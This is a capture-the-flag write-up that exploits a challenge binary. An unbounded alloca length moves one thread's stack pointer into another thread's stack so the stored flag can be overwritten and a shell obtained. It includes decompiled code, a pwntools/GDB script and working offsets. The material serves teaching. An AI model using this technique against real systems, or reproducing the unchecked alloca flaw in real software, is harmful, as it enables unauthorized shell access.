pwn/squ1rrel-logon
We are provided with a terminal binary that serves as an authenticated gateway to a command-line shell on the target server.
The main function spawns two threads, userinfo and auth:
int __fastcall main(int argc, const char **argv, const char **envp)
{
    setbuf(stdout, 0LL);
    setbuf(stdin, 0LL);
    print_banner();
    pthread_create(&userinfo_thread, 0LL, userinfo, 0LL);
    pthread_create(&auth_thread, 0LL, auth, 0LL);
    pthread_join(auth_thread, 0LL);
    return 0;
}
Note that the auth thread is spawned after the userinfo thread. This will be important in a moment.
alloca
Let's have a look at the userinfo thread:
void *__fastcall userinfo(void *a1)
{
    void *v1; // rsp
    void *v2; // rsp
    _QWORD v4[2]; // [rsp+0h] [rbp-30h] BYREF
    unsigned __int64 sname_len; // [rsp+10h] [rbp-20h] BYREF
    unsigned __int64 fname_len; // [rsp+18h] [rbp-18h] BYREF
    const char *v7; // [rsp+20h] [rbp-10h]
    const char *v8; // [rsp+28h] [rbp-8h]

    v4[1] = a1;
    puts("\x1B[1;36m[AUTH] User identification required\x1B[0m");
    printf("First Name Length: ");
    __isoc99_scanf("%ld%*c", &fname_len);
    printf("Surname Length: ");
    __isoc99_scanf("%ld%*c", &sname_len);
    if ( fname_len > 0x100000000LL || sname_len > 0x100000000LL )
    {
        puts("Too long for our systems.");
        exit(1);
    }
    v1 = alloca(16 * ((fname_len + 23) / 0x10));
    v8 = (const char *)v4;
    v2 = alloca(16 * ((sname_len + 23) / 0x10));
    v7 = (const char *)v4;
    printf("First Name: ");
    readline(v8, fname_len);
    printf("Surname: ");
    readline(v7, sname_len);
    printf("Authenticating Employee %s %s\n", v8, v7);
    return 0LL;
}
This looks fairly normal, except for the calls to alloca. Like malloc, the alloca function allocates memory dynamically. Unlike malloc, however, it takes that memory from the stack instead of the heap.
We can see how this works by inspecting the assembly:
mov rax, [rbp+fname_len]
lea rdx, [rax+8]
mov eax, 10h
sub rax, 1
add rax, rdx
mov ecx, 10h
mov edx, 0
div rcx
imul rax, 10h
sub rsp, rax
After some arithmetic that adds 8 to fname_len and rounds the result up to a multiple of 16, it simply does a sub rsp, rax.
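The rounding can be checked with a small Python sketch. The helper name alloca_size is hypothetical (it does not exist in the binary); it only mirrors the decompiled expression 16 * ((len + 23) / 0x10), which matches the assembly (len + 8 + 15, divided by 16, multiplied by 16).

```python
def alloca_size(length: int) -> int:
    """Bytes subtracted from rsp for a requested length.

    Hypothetical helper that mirrors the decompiled expression
    16 * ((length + 23) / 0x10) using integer division.
    """
    return 16 * ((length + 23) // 16)


if __name__ == "__main__":
    # Print the stack adjustment for a few sample lengths.
    for n in (0, 8, 9, 10, 24, 25, 5000):
        print(f"length {n:>5} -> sub rsp, {alloca_size(n)}")
```

Note that even a length of 0 moves rsp by 16 bytes, and a length of 10 moves it by 32.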
Recall that the stack grows from higher addresses to lower addresses, so a sub rsp, rax will allocate space on the stack. This space is automatically deallocated when the function returns and its stack frame is cleaned up.
However, notice that almost nothing checks whether we have enough stack space to accommodate the allocation. There is a check that fname_len is not more than 0x100000000 bytes, but this is still a very generous limit (4 GiB). We probably don't have 4 GiB of stack space to allocate!
So, what happens if we alloca more memory than we actually have? This will depend on the memory layout of the process. Let's have a look with vmmap in GDB:
Our current thread, userinfo, is thread 2. Its stack spans from 0x00007ffff7401000 to 0x00007ffff7c01000 (stack-th2).
Interestingly, the auth thread's stack (stack-th3) sits at a lower address than our thread's, from 0x00007ffff6a01000 to 0x00007ffff7201000. This is because the stack space for auth was allocated after the one for userinfo.
This means that if we allocate a sufficiently large buffer, we can make rsp point into the stack space of the auth thread! We can then write a first name of our choice into the stack memory of auth.
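To make the layout concrete, here is a small sketch using the two stack ranges quoted above. The starting rsp value is an assumption for illustration only (a point slightly below the top of the userinfo stack); the real value depends on the run.

```python
# Stack ranges quoted from the vmmap output in the text.
USERINFO_STACK = (0x00007ffff7401000, 0x00007ffff7c01000)  # stack-th2
AUTH_STACK = (0x00007ffff6a01000, 0x00007ffff7201000)      # stack-th3


def region_size(region):
    """Size in bytes of a (start, end) mapping."""
    start, end = region
    return end - start


def lands_in_auth(rsp, alloc_size):
    """True if rsp - alloc_size falls inside the auth thread's stack."""
    new_rsp = rsp - alloc_size
    return AUTH_STACK[0] <= new_rsp < AUTH_STACK[1]


# Unmapped gap between the top of auth's stack and the bottom of ours.
gap = USERINFO_STACK[0] - AUTH_STACK[1]

# Assumption: rsp starts 0x180 bytes below the top of the userinfo stack.
hypothetical_rsp = USERINFO_STACK[1] - 0x180

if __name__ == "__main__":
    print("stack size:", hex(region_size(USERINFO_STACK)))
    print("gap       :", hex(gap))
    print("32 bytes  :", lands_in_auth(hypothetical_rsp, 32))
    print("10 MiB    :", lands_in_auth(hypothetical_rsp, 10 * 1024 * 1024))
```

In this GDB session each thread stack is 8 MiB and the gap is 2 MiB, so an allocation of about 10 MiB is enough to move rsp from near the top of one stack to near the top of the other.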
But what should we target in the auth thread?
auth
Let's have a look at the auth function:
void *__fastcall auth(void *a1)
{
    char s1[256]; // [rsp+10h] [rbp-210h] BYREF
    char buf[264]; // [rsp+110h] [rbp-110h] BYREF
    int v4; // [rsp+218h] [rbp-8h]
    int fd; // [rsp+21Ch] [rbp-4h]

    fd = open("flag.txt", 0);
    if ( fd < 0 )
    {
        puts("Error initializing authentication. Please contact support if on remote.");
        exit(1);
    }
    v4 = read(fd, buf, 0x100uLL);
    buf[v4 - 1] = 0;
    close(fd);
    pthread_join(userinfo_thread, 0LL);
    printf("\x1B[1;36m[SYSTEM] Enter security token: \x1B[0m");
    readline(s1, 256LL);
    if ( !strcmp(s1, buf) )
    {
        puts("\x1B[1;32m[ACCESS GRANTED] Welcome to the system\x1B[0m");
        system("/bin/sh");
    }
    else
    {
        puts("\x1B[1;31m[ACCESS DENIED] Invalid security token\x1B[0m");
        puts("\x1B[1;31m[SYSTEM] Session terminated\x1B[0m");
    }
    return 0LL;
}
The key job of the auth function is to verify that the user knows the flag, which is stored on the stack in the buf variable. Since we do not know the flag, we cannot pass this check without cheating.
However, now that we can overwrite stack memory in auth, all we need to do is overwrite buf with a value we know, then enter that value as the security token to obtain a shell and read the flag.
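The idea can be modelled in a few lines of Python. This is only a toy simulation, not the binary's code: the flag value and token are placeholders, and it assumes that readline stores a terminating NUL byte after the input, which the decompilation shown here does not confirm.

```python
def c_string(memory: bytearray, start: int = 0) -> bytes:
    """Return the bytes from start up to the first NUL, as strcmp would see them."""
    end = memory.index(0, start)
    return bytes(memory[start:end])


# auth's buf: 264 bytes holding a flag we do not know (placeholder value).
buf = bytearray(264)
secret = b"flag{unknown_to_us}"
buf[:len(secret)] = secret

# Our first name is written at the start of buf.
# Assumption: the input ends up NUL-terminated in memory.
token = b"letmein"
buf[:len(token) + 1] = token + b"\x00"

# The comparison now only sees our token; the flag's tail is past the NUL.
access_granted = c_string(buf) == token

if __name__ == "__main__":
    print("buf as C string:", c_string(buf))
    print("access granted :", access_granted)
```

The leftover flag bytes after the NUL do not matter, because a C string comparison stops at the first NUL.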
The only obstacle now is to determine how much memory to allocate so that rsp falls exactly at the start of buf.
To do this, I wrote a simple script that prints the value of rsp after the buffer for the first name has been allocated, followed by the address of buf. Subtracting the second value from the first gives the required offset:
from pwn import *

e = ELF("terminal")
context.binary = e


def setup():
    p = process()
    # p = remote("")
    return p


if __name__ == '__main__':
    p = setup()
    # First breakpoint: after the first-name alloca, to read rsp.
    # Second breakpoint: where rsi holds the address of buf.
    _, g = gdb.attach(p, "break *0x401484\nbreak *0x4015fb\nc", api=True)
    # Probe run: both lengths are set to 10.
    p.sendlineafter(b"Length:", b"10")
    p.sendlineafter(b"Length:", b"10")
    g.wait()
    print(g.execute("p $rsp\nc", to_string=True))
    p.sendlineafter(b"ame:", b"A\n")
    p.sendlineafter(b"ame:", b"B\n")
    p.sendlineafter(b"token", b"A\n")
    g.wait()
    print(g.execute("p $rsi\nc", to_string=True))
    p.interactive()
Upon running this script, we might obtain something like:
$1 = (void *) 0x7f5ae9fffe80
$3 = 0x7f5ae95ffdc0
The difference between these values is 10485952. Since the probe run already used a fname_len of 10, we need to set fname_len to 10485952 + 10, which is 10485962.
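The arithmetic can be double-checked with a short sketch. The helper alloca_size is hypothetical and mirrors the decompiled rounding expression; the two addresses are the ones printed above.

```python
def alloca_size(length: int) -> int:
    """Hypothetical helper mirroring 16 * ((length + 23) / 0x10)."""
    return 16 * ((length + 23) // 16)


PROBE_LEN = 10                    # fname_len used in the probe run
rsp_after_probe = 0x7f5ae9fffe80  # rsp after the first alloca
buf_addr = 0x7f5ae95ffdc0         # address of buf in auth

# How much further rsp has to move down to reach buf.
offset = rsp_after_probe - buf_addr
fname_len = offset + PROBE_LEN

# Extra distance rsp actually moves when using fname_len instead of 10.
extra_shift = alloca_size(fname_len) - alloca_size(PROBE_LEN)

if __name__ == "__main__":
    print("offset     :", offset)
    print("fname_len  :", fname_len)
    print("extra shift:", extra_shift)
```

Here the extra shift equals the measured offset, which works out because the offset is a multiple of 16. If the two differed, the rounding in alloca would leave rsp slightly off target and the length would need adjusting.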
Unfortunately, if we use this fname_len as is, the program crashes with a segfault.
This is due to the stack space used during the
printf("Authenticating Employee %s %s\n", v8, v7);
call in userinfo. As rsp is within the stack memory of auth, any further stack usage will overwrite critical values stored on the stack of auth, resulting in a subsequent crash.
To solve this problem, we can set the surname length to a large value, such as 5000. This will ensure that rsp is far away from any critical parts of auth's memory when the printf call uses stack memory.
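A rough sketch of why the surname length matters, assuming the first alloca leaves rsp exactly at buf as intended. The frame offsets come from the decompiled auth function (buf at rbp-0x110, auth's own rsp at rbp-0x220); the helper alloca_size is hypothetical, and how much stack printf and auth's callees really use is not measured here.

```python
def alloca_size(length: int) -> int:
    """Hypothetical helper mirroring 16 * ((length + 23) / 0x10)."""
    return 16 * ((length + 23) // 16)


# From the decompilation: buf is at rbp-0x110 and auth's rsp is rbp-0x220,
# so auth's own frame extends 0x110 bytes below the start of buf.
AUTH_FRAME_BELOW_BUF = 0x220 - 0x110


def rsp_depth_below_buf(sname_len: int) -> int:
    """Distance of userinfo's rsp below buf after the surname alloca."""
    return alloca_size(sname_len)


def inside_auth_frame(sname_len: int) -> bool:
    """True if userinfo's rsp still sits inside auth's own stack frame."""
    return rsp_depth_below_buf(sname_len) < AUTH_FRAME_BELOW_BUF


if __name__ == "__main__":
    for sname_len in (10, 5000):
        print(sname_len, rsp_depth_below_buf(sname_len), inside_auth_frame(sname_len))
```

With a surname length of 10, rsp ends up only 32 bytes below buf, inside auth's frame, so the printf call writes over s1 and whatever lies beneath it. With 5000, rsp is 5008 bytes below buf, well past auth's own frame. Whether that also clears everything auth's blocked pthread_join call keeps on the stack is an assumption that the successful local run supports.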
With this fix, we are successful in obtaining a shell locally:
However, the same exploit does not work on the server 🤔
Debugging
Perplexed, I sent my script and exploit to a teammate for some suggestions. To my surprise, the output of the script on his system was:
$1 = (void *) 0x7f68450aedb0
$2 = 0x7f68448adcea
The difference was 8392902, much smaller than the expected 10485952 calculated on my system.
On his system, the correct fname_len should thus have been 8392912 instead of 10485962.
A vmmap explains this discrepancy:
On this system, there is no gap between the end of the stack space for the auth thread and the start of the next mapping. On my system, however, there is a large unmapped region, which results in a larger offset. This difference is probably a result of different kernel versions placing these mappings slightly differently.
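The two measurements can be compared directly. The sketch below only redoes the subtraction for both pairs of addresses printed by the script and sets the results side by side.

```python
MIB = 1024 * 1024
PROBE_LEN = 10  # fname_len used in both probe runs

# Values printed on my system.
my_offset = 0x7f5ae9fffe80 - 0x7f5ae95ffdc0
# Values printed on my teammate's system.
his_offset = 0x7f68450aedb0 - 0x7f68448adcea

# Difference between the two systems, in bytes.
delta = my_offset - his_offset

if __name__ == "__main__":
    print("my offset :", my_offset, f"({my_offset / MIB:.2f} MiB)")
    print("his offset:", his_offset, f"({his_offset / MIB:.2f} MiB)")
    print("difference:", delta, f"({delta / MIB:.2f} MiB)")
    print("fname_len :", my_offset + PROBE_LEN, "vs", his_offset + PROBE_LEN)
```

The offsets differ by roughly 2 MiB, which is about the size of the unmapped gap between the two thread stacks seen in the earlier vmmap output (0x00007ffff7201000 to 0x00007ffff7401000).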
After replacing the fname_len with the newly calculated 8392912, the exploit works as expected: